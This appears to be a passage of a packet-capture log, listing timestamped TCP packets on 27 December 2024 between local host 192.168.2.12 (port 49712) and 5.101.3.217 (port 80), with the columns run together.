                                                        Dec 27, 2024 14:54:14.359194994 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.388747931 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.508388042 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508398056 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508425951 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508460999 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508555889 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508573055 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508676052 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508686066 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508718967 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508763075 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.508819103 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.628407955 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.628451109 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.628528118 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.628552914 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.628571987 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.628607988 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.628632069 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.628665924 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.628690958 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.628715992 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.628734112 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.673590899 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.673825026 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.789803028 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.789940119 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:14.837543011 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.953664064 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:14.953727961 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.153717995 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.153785944 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.398154020 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.398216963 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.442024946 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.442159891 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.442248106 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.517936945 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.518043041 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.561822891 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.561860085 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.561883926 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.561914921 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.561933994 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.561955929 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.561997890 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562001944 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562040091 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562051058 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562094927 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562150955 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562171936 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562205076 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562242031 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562282085 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562304974 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562333107 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562340021 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562361956 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562391996 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562434912 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562495947 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562500000 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562553883 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562578917 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562632084 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.562659025 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562725067 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562766075 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562869072 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.562915087 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563005924 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563051939 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563127995 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563206911 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563273907 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563353062 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563476086 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563483000 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563508034 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563546896 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563564062 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563620090 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563623905 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563678026 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563731909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563787937 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.563791037 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.563842058 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.605627060 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.605679989 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.638092995 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.638159990 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.681732893 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.681838036 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.681876898 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.681883097 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.681938887 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.681962013 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.681967974 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682080030 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682180882 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682224035 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682302952 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682367086 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682444096 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682518005 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682575941 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682699919 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682782888 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682853937 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682908058 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.682934999 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683079004 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683089972 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683192968 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683202982 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683218956 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683267117 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683332920 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683350086 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683377981 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683408976 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683438063 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683449030 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683486938 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683505058 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683549881 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683562040 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683604956 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683691025 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683702946 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683713913 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683725119 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683743954 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683764935 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.683835983 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683845997 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683856964 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683876991 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683940887 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.683950901 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684055090 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684066057 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684133053 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684146881 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684204102 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684252977 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684364080 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684375048 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684432983 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684443951 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684525013 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684582949 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684602976 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684631109 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684710026 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684722900 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684815884 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684828997 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684866905 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684911966 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684957981 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.684989929 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.685091019 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.725222111 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.757673025 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.757922888 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801467896 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801492929 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801656008 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801676989 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801708937 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801721096 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.801786900 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.802207947 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.802297115 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.802846909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.802887917 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803031921 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803057909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803226948 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803369999 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803422928 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803448915 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803581953 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803600073 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803692102 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803705931 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803783894 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803813934 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803905964 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.803916931 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804011106 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804020882 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804069996 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804095030 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804208040 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804227114 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804316998 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804327011 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804411888 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804445028 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804583073 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804625988 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804688931 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804698944 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804742098 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804794073 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804805040 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804887056 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804897070 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804965019 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.804985046 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805063009 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805082083 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805244923 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805263042 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805315018 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805335999 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805514097 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805610895 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805620909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805778980 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805789948 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805799007 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805885077 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805900097 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805941105 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805951118 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.805960894 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.806256056 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.806330919 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.921736956 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.921941996 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.921956062 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922075033 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922086000 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922152996 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922171116 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922286987 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922297955 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922400951 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922410965 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922497988 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922511101 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922606945 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922619104 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922749996 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922760010 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922866106 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922883034 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922960997 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.922990084 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923031092 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923096895 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923135042 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923165083 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923286915 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923296928 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923393965 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923403978 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923532963 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923549891 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923643112 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923652887 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923691034 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923701048 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923803091 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923814058 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923860073 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923870087 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.923995018 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924005032 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924115896 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924125910 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924213886 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924222946 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924298048 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924320936 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924407005 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924424887 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924555063 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924566031 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924633026 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924663067 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.924770117 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.925126076 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.925215006 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:15.925812006 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.925822973 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.925842047 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926008940 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926136017 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926172018 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926182032 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926279068 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926289082 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926378012 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926387072 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926461935 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926517010 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926604033 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926639080 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926685095 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926712990 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926819086 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926830053 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926840067 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926970005 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926980019 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.926990032 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927059889 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927071095 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927103043 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927139997 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927184105 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927232027 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927290916 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927320957 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927401066 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927418947 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927534103 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927608013 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927706957 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927716970 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927742004 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927753925 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927769899 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927779913 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927922010 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927933931 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927951097 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.927961111 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928005934 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928014994 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928057909 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928069115 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928112984 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928157091 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928261042 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928271055 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928337097 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:15.928560019 CET4971280192.168.2.125.101.3.217
                                                        Dec 27, 2024 14:54:16.044646025 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.044888020 CET80497125.101.3.217192.168.2.12
                                                        Dec 27, 2024 14:54:16.044903994 CET80497125.101.3.217192.168.2.12
